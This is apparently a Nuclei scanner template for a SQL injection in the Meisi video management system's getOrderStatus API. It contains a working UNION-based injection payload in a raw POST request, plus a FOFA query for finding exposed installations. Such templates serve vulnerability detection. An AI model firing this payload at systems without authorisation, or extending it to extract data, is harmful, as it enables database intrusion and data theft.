id: meisi-getOrderStatus-sqli
info:
  name: 魅思视频管理系统 getOrderStatus - sqli
  author: leadlife
  severity: high
  description: 魅思视频管理系统getOrderStatus存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
  reference: 
    - https://github.com/wy876/POC/blob/main/%E9%AD%85%E6%80%9D%E8%A7%86%E9%A2%91%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E9%AD%85%E6%80%9D%E8%A7%86%E9%A2%91%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FgetOrderStatus%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="魅思-视频管理系统"
  tags: meisi,sqli

http:
  - raw:
      - |
        POST /api/getOrderStatus HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

        orderSn=%27%29+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%28IFNULL%28CAST%28md5%281%29+AS+NCHAR%29%2C0x20%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+-

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body,md5(1))
        condition: and